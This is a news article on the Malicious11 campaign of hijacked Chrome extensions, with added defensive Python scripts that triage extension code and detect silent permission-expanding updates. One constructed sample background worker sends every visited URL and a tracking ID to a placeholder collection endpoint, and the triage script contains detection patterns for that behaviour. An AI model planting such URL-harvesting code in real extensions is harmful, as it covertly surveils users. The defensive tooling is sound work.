A sophisticated malware campaign has compromised the browsers of over 1.7 million Chrome users through eleven seemingly legitimate browser extensions, all bearing Google’s verified badge and featured prominently on the Chrome Web Store. This Malicious11 campaign, uncovered by cybersecurity researchers at Koi Security, stands as one of the most extensive browser hijacking operations to date, exploiting the trust users place in verified extensions.
The Deceptive Facade
The malicious extensions posed as popular productivity and entertainment tools, spanning categories such as emoji keyboards, weather forecasts, video speed controllers, VPN proxies for Discord and TikTok, dark themes, volume boosters, and YouTube unblockers. Each extension functioned as advertised, delivering the promised features while covertly embedding surveillance and hijacking capabilities.
The investigation commenced with the analysis of Color Picker, Eyedropper — Geco colorpick, an extension boasting over 100,000 installs and more than 800 reviews. Despite its legitimate appearance and verified status, the extension was secretly commandeering users’ browsers, tracking every website visit, and maintaining a persistent command and control backdoor.
Notably, these extensions were not malicious from inception. They operated legitimately for years before becoming harmful through version updates. The codebase of each extension remained clean until the malware was introduced via automatic updates that silently installed for over 1.7 million users.
“Due to how Google handles browser extension updates, these versions are auto-installed silently,” the researchers noted. No phishing. No social engineering. Just trusted extensions with a quiet version bump.
Advanced Browser Hijacking Techniques
The malware employed a sophisticated browser hijacking mechanism that activated each time users navigated to a new page. Concealed within each extension’s background service worker was code that monitored all tab activity, capturing URLs and transmitting them to remote servers along with unique tracking identifiers.
This setup created a persistent man-in-the-middle capability that could be exploited at any moment. For instance, users clicking on Zoom meeting invitations could be redirected to counterfeit pages claiming the need to download critical updates, or banking sessions could be intercepted and redirected to exact replicas hosted on attackers’ servers.
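The combination described above, a background service worker that subscribes to tab events and ships the visited URLs plus an identifier to a remote host, is something a defender can triage statically from an unpacked extension. The script below is an added example for this article, not code from Koi Security’s report or from any of the extensions it names; the two manifest/background-script pairs and the `example.com` endpoint are constructed here for illustration.

```python
"""Static triage of an unpacked Chrome extension for the hijacking pattern
described in the article: a background service worker that watches tab
activity and posts the URLs, with an identifier, to a remote server.

Added example; the sample bundles and the example.com endpoint are constructed.
"""
import re

# Host patterns that give a script visibility into every site the user opens.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Events a background script can subscribe to in order to observe navigations.
TAB_MONITOR_PATTERNS = [
    r"chrome\.tabs\.onUpdated\.addListener",
    r"chrome\.tabs\.onActivated\.addListener",
    r"chrome\.webNavigation\.on\w+\.addListener",
]
# Primitives that can carry collected data off the machine.
OUTBOUND_PATTERNS = [r"\bfetch\s*\(", r"\bXMLHttpRequest\b", r"navigator\.sendBeacon"]
# Hard-coded remote endpoints in the worker source.
REMOTE_URL = re.compile(r"https?://[\w.-]+(?:/[^\s'\"`]*)?")


def triage_extension(manifest: dict, background_js: str) -> dict:
    """Return findings and a verdict for one unpacked extension.

    'suspicious' requires the combination the article describes: the worker
    both observes tab/navigation events and talks to a remote endpoint.
    Either indicator alone is common in benign extensions and rates 'review'.
    """
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    findings = []
    if perms & BROAD_HOSTS:
        findings.append("broad host permission")
    if perms & {"tabs", "webNavigation"}:
        findings.append("tabs/webNavigation permission")

    monitors = any(re.search(p, background_js) for p in TAB_MONITOR_PATTERNS)
    outbound = any(re.search(p, background_js) for p in OUTBOUND_PATTERNS)
    remote = sorted(set(REMOTE_URL.findall(background_js)))
    if monitors:
        findings.append("background script subscribes to tab/navigation events")
    if outbound:
        findings.append("background script issues outbound requests")
    if remote:
        findings.append("hard-coded remote endpoint(s): " + ", ".join(remote))

    if monitors and (outbound or remote):
        verdict = "suspicious"
    elif monitors or outbound or remote or (perms & BROAD_HOSTS):
        verdict = "review"
    else:
        verdict = "low"
    return {"verdict": verdict, "findings": findings}


# Constructed sample 1: a colour picker that only acts on the active tab on click.
BENIGN_MANIFEST = {
    "manifest_version": 3,
    "name": "Sample Color Picker",
    "version": "1.0.0",
    "permissions": ["activeTab", "storage"],
}
BENIGN_BG = """
chrome.action.onClicked.addListener(function (tab) {
  chrome.scripting.executeScript({ target: { tabId: tab.id }, files: ["picker.js"] });
});
"""

# Constructed sample 2: same feature, plus a worker that reports each visited URL
# together with a per-install identifier to a placeholder endpoint.
SUSPICIOUS_MANIFEST = {
    "manifest_version": 3,
    "name": "Sample Color Picker",
    "version": "1.4.2",
    "permissions": ["activeTab", "storage", "tabs"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
}
SUSPICIOUS_BG = """
chrome.tabs.onUpdated.addListener(function (tabId, change) {
  if (!change.url) return;
  chrome.storage.local.get("uid", function (s) {
    fetch("https://example.com/collect", {
      method: "POST",
      body: JSON.stringify({ url: change.url, uid: s.uid })
    });
  });
});
"""

if __name__ == "__main__":
    for label, m, bg in (("benign", BENIGN_MANIFEST, BENIGN_BG),
                         ("suspicious", SUSPICIOUS_MANIFEST, SUSPICIOUS_BG)):
        print(label, triage_extension(m, bg))
```

Run against a real unpacked extension by loading its `manifest.json` and the file named under `background.service_worker`. The verdict is deliberately conservative: only the pairing of navigation monitoring with an outbound channel is rated suspicious, because each half on its own is legitimately used by many extensions (tab managers, sync features).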
Systemic Security Failures
The Malicious11 campaign exposes significant shortcomings in marketplace security. Google’s verification process failed to detect sophisticated malware across eleven different extensions, instead promoting several through verification badges and featured placement.
The attackers successfully exploited every trust signal users rely on—verification badges, install counts, featured placement, years of legitimate operation, and positive reviews.
Mitigation Measures
Users should immediately remove any affected extensions, clear browser data to eliminate stored tracking identifiers, run comprehensive system malware scans, and monitor accounts for suspicious activity.
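Because the extensions turned malicious through silent version bumps rather than at install time, the practical control is to baseline what is installed and alert when a version changes or an extension acquires permissions it did not previously hold. The script below is an added example, not part of the article or of any Chrome tooling; it reads the standard on-disk layout Chrome uses for installed extensions (`<profile>/Extensions/<id>/<version>_0/manifest.json`) and demonstrates the check against two constructed profile snapshots in temporary directories.

```python
"""Baseline installed Chrome extensions and alert on silent updates or
permission expansion. Added example; the demo data is constructed.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def snapshot_extensions(extensions_root: Path) -> dict:
    """Map extension id -> name, version, permissions and manifest hash.

    Chrome stores each installed extension as <root>/<id>/<version>_0/manifest.json.
    If several version directories exist, the lexically last one is recorded.
    """
    snap = {}
    for ext_dir in sorted(p for p in extensions_root.iterdir() if p.is_dir()):
        for ver_dir in sorted(p for p in ext_dir.iterdir() if p.is_dir()):
            manifest_path = ver_dir / "manifest.json"
            if not manifest_path.exists():
                continue
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
            perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
            snap[ext_dir.name] = {
                "name": manifest.get("name", "?"),
                "version": manifest.get("version", ver_dir.name),
                "permissions": sorted(perms),
                "manifest_sha256": hashlib.sha256(manifest_path.read_bytes()).hexdigest(),
            }
    return snap


def diff_snapshots(old: dict, new: dict) -> list:
    """Compare two snapshots; every returned string is something worth a look."""
    alerts = []
    for ext_id, cur in new.items():
        prev = old.get(ext_id)
        if prev is None:
            alerts.append(f"{ext_id}: newly installed ({cur['name']} {cur['version']})")
            continue
        if cur["version"] != prev["version"]:
            alerts.append(f"{ext_id}: version changed {prev['version']} -> {cur['version']}")
        added = set(cur["permissions"]) - set(prev["permissions"])
        if added:
            alerts.append(f"{ext_id}: new permissions {sorted(added)}")
    for ext_id in old.keys() - new.keys():
        alerts.append(f"{ext_id}: removed")
    return alerts


def _write_extension(root: Path, ext_id: str, manifest: dict) -> None:
    """Write manifest.json where Chrome would place it for this id and version."""
    ver_dir = root / ext_id / f"{manifest['version']}_0"
    ver_dir.mkdir(parents=True)
    (ver_dir / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")


def run_demo() -> list:
    """Constructed scenario: a long-trusted extension that, after a silent
    update, asks for tab visibility and all-hosts access it never needed."""
    ext_id = "abcdefghijklmnopabcdefghijklmnop"  # constructed 32-character id
    before = {"manifest_version": 3, "name": "Sample Picker", "version": "1.2.0",
              "permissions": ["activeTab", "storage"]}
    after = {"manifest_version": 3, "name": "Sample Picker", "version": "1.3.0",
             "permissions": ["activeTab", "storage", "tabs"],
             "host_permissions": ["<all_urls>"],
             "background": {"service_worker": "bg.js"}}
    with tempfile.TemporaryDirectory() as d1, tempfile.TemporaryDirectory() as d2:
        _write_extension(Path(d1), ext_id, before)
        _write_extension(Path(d2), ext_id, after)
        return diff_snapshots(snapshot_extensions(Path(d1)), snapshot_extensions(Path(d2)))


if __name__ == "__main__":
    for line in run_demo():
        print(line)
```

For real use, point `snapshot_extensions` at the profile’s extension directory (`~/.config/google-chrome/Default/Extensions` on Linux, `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions` on Windows), save the result as JSON, and diff against it on a schedule. A version bump alone is routine; a version bump that arrives together with new `tabs`, `webNavigation` or `<all_urls>` permissions is exactly the change that deserves a manual look before the extension is allowed to stay.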
This incident underscores the urgent need for enhanced marketplace security mechanisms as threat actors evolve beyond individual attacks to create comprehensive infrastructures that can remain dormant for years before activation.
This campaign represents a pivotal moment in browser extension security, demonstrating how the current marketplace security model is vulnerable to sophisticated, long-term infiltration strategies.